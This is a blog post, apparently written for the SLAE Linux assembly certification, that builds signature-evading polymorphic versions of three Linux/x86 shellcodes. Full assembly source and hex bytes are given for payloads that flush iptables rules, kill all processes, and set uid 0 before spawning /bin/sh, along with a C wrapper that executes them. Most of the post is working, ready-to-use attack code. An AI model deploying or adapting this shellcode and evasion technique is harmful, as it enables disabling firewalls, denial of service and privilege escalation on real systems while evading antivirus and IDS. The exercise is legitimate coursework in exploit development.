SLAE 0x6 – Polymorphic Shellcode

Anti-Virus and IDS vendors constantly create signatures for any new type of shellcode to keep their products updated to protect against attacks.  But malware developers also try and remain ahead of the game by finding new ways to evade AV/IDS .
Today we will cover creating Polymorphic shellcodes that are often used to defeat signature based AV/IDS.

Note this method will not protect against heuristic based AV/IDS.

Polymorphic Shellcodes
Polymorphic shellcodes are finding equivalent instuctions that perform the same result.  We do this by replacing the existing assembly instructions with different assembly instructions that still logically perform the same operation. As a result, signature based AV/IDS fail to identify malicious code/traffic.

Lets take 3 different shellcodes from shell-storm.org and create polymorphic versions of them.

Linux/x86 iptables -F

Below is our polymorphic shellcode. We have used simple techniques like replacing xor eax, eax with sub eax, eax. Next instead of pushing the string of bytes ///sbin/iptables we have moved the string of bytes on the stack at esp-4, esp-8 and esp-12 position and then adjusted the stack accordingly. Notice we have also split 0x61747069 into 0x51636058 and 0x10111011. Also instead of ///sbin/iptables we are moving //sbin//iptables on the stack.

; Original Shellcode - 43 bytes: http://shell-storm.org/shellcode/files/shellcode-825.php
; Polymorphic Shellcode - 62 bytes
; Author: buffered4ever
; 15-03-2019
global _start
section .text
_start:

sub eax,eax ; changed from xor eax, eax
push eax
push word 0x462d
mov esi, esp
push eax
push 0x73656c62
mov edi, 0x51636058
add edi, 0x10111011 ; changed from push 0x61747069
mov dword[esp-4], edi
mov dword[esp-8], 0x2f2f6e69 ; changed from push 0x2f6e6962
mov dword[esp-12], 0x62732f2f ;  sbchanged from push 0x732f2f2f
sub esp, 12 ; adjusting the stack
mov ebx, esp
push eax
push esi
push ebx
mov ecx, esp
mov edx, eax
mov al, 0xb
int 0x80

Lets compile and link the assembly code
ddpinto@slae:~$ ./compile.sh poly1
[+] Assembling with NASM …
[+] Linking …
[+] Done! …
Now lets use some cmdfu to generate the shellcode

ddpinto@slae:~$ objdump -d ./poly1|grep ‘[0-9a-f]:’|grep -v ‘file’|cut -f2 -d:|cut -f1-7 -d’ ‘|tr -s ‘ ‘|tr ‘\t’ ‘ ‘|sed ‘s/ $//g’|sed ‘s/ /\\x/g’|paste -d ” -s |sed ‘s/^/”/’|sed ‘s/$/”/g’
“\x29\xc0\x50\x66\x68\x2d\x46\x89\xe6\x50\x68\x62\x6c\x65\x73\xbf\x58\x60\x63\x51\x81\xc7\x11\x10\x11\x10\x89\x7c\x24\xfc\xc7\x44\x24\xf8\x69\x6e\x2f\x2f\xc7\x44\x24\xf4\x2f\x2f\x73\x62\x83\xec\x0c\x89\xe3\x50\x56\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80”

Now lets include the shellcode into our cwrapper

// Linux/x86 iptables -F
// Original Shellcode - 43 bytes: http://shell-storm.org/shellcode/files/shellcode-825.php
// Polymorphic Shellcode - 62 bytes
// Author: buffered4ever
// 15-03-2019
#include
#include
unsigned char code[] = \
"\x29\xc0\x50\x66\x68\x2d\x46\x89\xe6\x50\x68\x62\x6c\x65\x73\xbf\x58\x60\x63\x51\x81\xc7\x11\x10\x11\x10\x89\x7c\x24\xfc\xc7\x44\x24\xf8\x69\x6e\x2f\x2f\xc7\x44\x24\xf4\x2f\x2f\x73\x62\x83\xec\x0c\x89\xe3\x50\x56\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80";
main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}

Lets compile the c code.
ddpinto@slae:~$ gcc -fno-stack-protector -z execstack shellcode_poly1.c -o shellcode_poly1

Before we run the shellcode lets check the iptables rules

ddpinto@slae:~$ sudo iptables -L
Chain INPUT (policy ACCEPT)
target prot opt source destination
ACCEPT tcp -- anywhere anywhere tcp dpt:http
Chain FORWARD (policy ACCEPT)
target prot opt source destination
Chain OUTPUT (policy ACCEPT)
target prot opt source destination

We have a rule that allows http from any source to any destination
Now lets run the shellcode and check the iptables rules again

ddpinto@slae:~$ sudo ./shellcode_poly1
Shellcode Length: 62
ddpinto@slae:~$ sudo iptables -L
Chain INPUT (policy ACCEPT)
target prot opt source destination
Chain FORWARD (policy ACCEPT)
target prot opt source destination
Chain OUTPUT (policy ACCEPT)
target prot opt source destination

Our polymorphic shellcode works and the iptables have been flushed.

Kill all processes for Linux/x86

Our second shellcode has a very subtle differences. Instead of pushing and popping 9 into ecx we are directly moving byte 9 into cl. This reduces the size by 1 byte. The original shellcode was 11 bytes. Our shellcode is 10 bytes.

; linux/x86 kill all processes
; Original Shellcode - 11 bytes: http://shell-storm.org/shellcode/files/shellcode-212.php
; Polymorphic Shellcode - 10 bytes
; Author: buffered4ever
; 15-03-2019
global _start
section .text

_start:
; kill(-1, SIGKILL);

push byte 37
pop eax ; #define __NR_kill 37
push byte -1
pop ebx;
mov cl, 9 ; changed from push byte 9 pop ecx
int 0x80

linux x86 setresuid(0,0,0)-/bin/sh

The third shellcode we have again made simple changes like substituting xor eax, eax to sub eax, eax. We have removed cdq and substitued by and edx, eax which flushes the edx register. The comments in the below code explains what are the changes from the original shellcode.

; linux x86 setresuid(0,0,0)-/bin/sh
; Original Shellcode - 35 bytes: http://shell-storm.org/shellcode/files/shellcode-220.php
; Polymorphic Shellcode - 41 bytes
; Author: buffered4ever
; 15-03-2019

global _start

section .text
_start:

;setresuid(0,0,0)
sub eax, eax ; changed from xor eax, eax
mov ebx, eax ; changed from xor ebx, ebx
xor ecx, ebx ; changed from xor ecx, ecx
and edx, eax ; changed from cdq
add al, 0xa5 ; changed from mov al, 0xa4
sub al, 1
int 0x80

; execve("/bin//sh", ["/bin//sh", NULL], [NULL])
xor eax, eax
mov al, 10
add al, 1 ; changed push byte 11 and pop eax
push ecx
push 0x68732f6e ; changed from 0x68732f2fi
push 0x69622f2f ; changed from 0x6e69622f
mov ebx, esp
push ecx
mov edx, esp
push ebx
mov ecx, esp
int 0x80

Github: https://github.com/buffered4ever/SLAE – 0x6

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/

Student ID: PA-1932

Leave a comment

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: